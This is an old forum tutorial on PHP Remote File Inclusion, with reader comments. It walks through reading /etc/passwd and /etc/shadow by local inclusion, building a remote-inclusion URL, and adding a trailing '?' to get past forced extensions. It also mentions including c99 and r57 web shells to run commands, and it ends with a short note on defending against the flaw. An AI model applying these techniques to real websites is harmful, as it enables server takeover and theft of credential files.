Skip navigation.
Home

The basics of Remote File Inclusion

Many people have heard of it, seen it, and may have tried it.. But do they really know what it does? Because there are still a lot of people who do not know what RFI (Remote File Inclusion) actually is, or does, I have decided to write a little(?) tutorial about it. It will basically just explain and 'show' how RFI actually works, and help you understand the basics.

After reading this, you should be able to recognize RFI's, and you will be able to find and use it. At least, that's what I think.

Since this is my first 'tutorial', I would like to have your opinion on it, so leave me a comment.

- KnickLighter's Tutorial

Welcome to KnickLighter

I recommend checking this tutorial out. I learned a bit about a few things I didn't know before.

Thanks KnickLighter!

V.

You're welcome

You're welcome, I hope more people find this piece of text useful :)

RFI

thanks bro!
i've already read ur tutorial...!
i clearly understand the whole tutorial.
but..!
i hav some questions for the following statement
***We will now create an other file on Server 1, which we will call "test.txt". This file will only
contain the following:

***
i mean how to create this file on server 1???
how to make inclusion on Server 1

can u explain more plzzzz!
u can send e-mail to cableguy.lucifa.demon@gmail.com

:)

Hi, I saw that you had stated that question on my board too, I'll paste it here, for if more people don't understand it:

Hello cableguy,

This example is just as seeing that you have 2 'own' server where you can create files on.

In the first server, you will create the vulnerable page.

But then you will have to test the page, wether it's really vulnerable or not.

That we try with LFI, and later on RFI.

Basically this is not really necessary, but we just test if your server is compatible with our vulnerability.

I hope that now you understand what it means..

Greetz,
~KL

Mirror

Title: PHP RFI (Remote File Inclusion) tutorial.
Author: KnickLighter
Date: 22-01-2008
Website: http://www.hackerarmy.org/

Base:

Remote File Inclusion, or, RFI, may sound hard, but it's basically
very easy. The title itself already explains a bit about it. You will basically include a file on a server, which is hosted on an other server. With RFI, you use an URL-based type of 'hacking'.

Of course, this will only be possible if the server supports PHP and allows Remote URL access. Let's make an example of a RFI. Say we have "server1.com" as vulnerable,and we have our filehosted on "server2.com". Both server's httpd root directories are "/var/www".

Server 1 has a
vulnerability in their index.php. Server 2 contains our code which we want to include on Server 1 This is how a simple (and vulnerable) inclusion should look like, which we use as example on
the index.php of Server 1:

Now before we continue with RFI, and the file on Server 2, we will first test the code on the first server with LFI (Local File Inclusion), which is the same as RFI, only this method uses files which are hosted on the current (local) server, not a remote server. This method is often
used in Linux to get "/etc/passwd" and sometimes "/etc/shadow".

We will now create an other file on Server 1, which we will call "test.txt".

This file will only
contain the following:

Now we can test our inclusion on Server 1. We will include "test.txt"
to see if it's working. An inclusion looks like "index.php?page=file", since we use "$page" and "$_GET['page']". so the

URL will be:
http://server1.com/index.php?page=test.txt

If it works, you should see the text on the page, which will be:
Hello, this is a test. If you did not create the test.txt, or if it's just not there, you should see the following error:

Warning: main(test.txt) [function.main]: failed to open stream: No

such file or directory in
/var/www/index.php on line 1

Remember that some servers have URL access disabled. This makes

it impossible to include external (or Remote) files. This means you can not use "http://" or "ftp://" in an inclusion, but sometimes
you can still use LFI on those websites.

Ok, so now we know that the inclusion works. We can now create our file
on Server 2. Let's call it "include.txt". This file will contain the following:

Now you are ready to do your RFI. It looks like this:

SERVER 1 SERVER 2
http://server1.com/index.php?page= http://server2.com/include.txt
\ /
\ /
\ _/

___________________________________________________________________
| http://server1.com/index.php?page=http://server2.com/include.txt | --------------------------------------------------------------------

That is how your final URL should be. If it works, you'll see the
text of include.txt in the page of Server 1. Which will be: Your RFI seems to be working. Now there's something you should remember, and that is that some websites already have a filetype configured in their include script, such as:

Then if you use "index.php?page=test", it will include "test.html" on the
local server. If this is the case, then your "http://server2.com/include.txt" will not work. You can bypass this by placing a question mark after your own URL, so it will be "http://server2.com/include.txt?".

Then the URL should look like:
http://server1.com/index.php?page=http://server2.com/include.txt?

What this will do is include "http://server2.com/include.txt?.html", but because of your question mark, it will forget about ".html" and will just include your URL. However, this is not all you can do with RFI. You can also include shell scripts, such as "c99"
and "r57". These scripts will allow you to execute commands or do lots of other things on the server.

For my own websites, I also use inclusions, but I've blocked the ability to use RFI. Here's a little bit of code which can help you on your way to secure your own pages:

This code will first check if the file which is requested, exists. If so, it includes it. If not, it will simply include home.php.

-
I hope this tutorial helped you to understand about RFI and how to use it. If you still have any questions or whatever, just contact me.

Also join me on IRC:
irc.hackerarmy.org 6667
#home

Updated

Yeah, hackerarmy.org is gone, the link has been updated now, sorry for the delay :d